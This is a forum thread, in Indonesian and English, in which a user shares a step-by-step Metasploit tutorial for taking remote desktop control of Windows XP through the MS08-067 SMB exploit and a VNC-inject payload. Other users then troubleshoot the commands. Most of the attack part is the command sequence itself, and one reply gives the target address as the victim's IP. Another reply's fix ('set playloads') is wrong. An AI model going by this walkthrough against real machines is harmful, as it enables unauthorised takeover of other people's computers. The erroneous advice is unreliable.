[Share] Remote Windows using metasploit
#21
kalo ke sistemnya win 7 bisa kagak om???

#22
(04-26-2012, 09:59 PM)cinta1malam Wrote: ok guys this time i will explain a simple tutorial, remote windows using metasploit...i'm use 1 komputer with OS windows XP SP3 (on VirtualBox) and Bactrack 5 R2, sorry if this tutorial repost from other tutorial else in this forum, and apologize if my english so bad..
ip WINDOW XP SP3 = 192.168.0.124
ip BACTRACK 5 R2 = 192.168.0.100
tools = msfconsole

in the first time...you can look this SS, i'm using "msfconsole" for remote windows in bactrack. then type command "use exploit/windows/smb/ms08_067_netapi".

[Image: scaled.php?server=708&filename=gambar1j.jpg&res=landing]

then type command "set PAYLOAD windows/vncinjext/bind_tcp" on terminal like this

[Image: scaled.php?server=846&filename=gambar2i.jpg&res=landing]

langkah cepatnya juga ada mas bro..
dapatkan aja session meterpreternya dengan langkah yang umum aja,,
trus,, kalo udah di meterpreter, ketik aja :

meterpreter>run vnc


itu kalo cara saya mas bro.


then type "set RHOST IP_TARGET" as below

[Image: scaled.php?server=254&filename=gambar3h.jpg&res=landing]

then running expoit like this

[Image: scaled.php?server=15&filename=gambar4.jpg&res=landing]

finally, a remote dekstop using msfconsole in bactrack 5 R2 succeed.

[Image: scaled.php?server=252&filename=gambar5.jpg&res=landing]

see you next tutorial bro....Confused


#23

pas ketik msf exploit(ms08_067_netapi) > use payload windows/vncinject/reverse_tcp yang muncul Failed to load module: payload

#24
(10-19-2012, 03:02 PM)globa Wrote: pas ketik msf exploit(ms08_067_netapi) > use payload windows/vncinject/reverse_tcp yang muncul Failed to load module: payload

coba ketik payloadnya dgn huruf besar mas / kapital
"PAYLOAD"

Smile

#25
sudah bang tapi masi gitu

#26
(10-19-2012, 03:02 PM)globa Wrote: pas ketik msf exploit(ms08_067_netapi) > use payload windows/vncinject/reverse_tcp yang muncul Failed to load module: payload

mari saya bantu urutkan mulai smpai selesainya...
1. masuk ke terminal dan ketik "msfconsole" tanpa tanda petik
2. setelah muncul tampilan msfconsole ketik "use windows/smb/ms08_067_netapi" tanpa tanda petik
3. ketik "set PAYLOAD windows/vncinject/bind_tcp" tanpa tanda petik
4. ketik "set RHOST 192.168.1.88" tanpa tanda petik dan bila 192.168.1.88 adalah IP korban
5. ketik "exploit" tanpa tanda petik untuk memulai remote...


#27
(10-20-2012, 02:48 AM)handyk Wrote:
(10-19-2012, 03:02 PM)globa Wrote: pas ketik msf exploit(ms08_067_netapi) > use payload windows/vncinject/reverse_tcp yang muncul Failed to load module: payload

coba ketik payloadnya dgn huruf besar mas / kapital
"PAYLOAD"

Smile

gini mas coba cara ini
set playloads windows/vncinject/bind_tcp


payload nya ada tambahan huruf s blakang nya Big Grin
maap lupa di atas

#28
(10-19-2012, 03:02 PM)globa Wrote: pas ketik msf exploit(ms08_067_netapi) > use payload windows/vncinject/reverse_tcp yang muncul Failed to load module: payload

Bukan use tapi set :-)


#29
nanya bro itu cuma 1 LAN apa IP bebas meski beda koneksi juga bisa?

#30
PAYLOAD nya k g mau ya Om ????






Users browsing this thread: 1 Guest(s)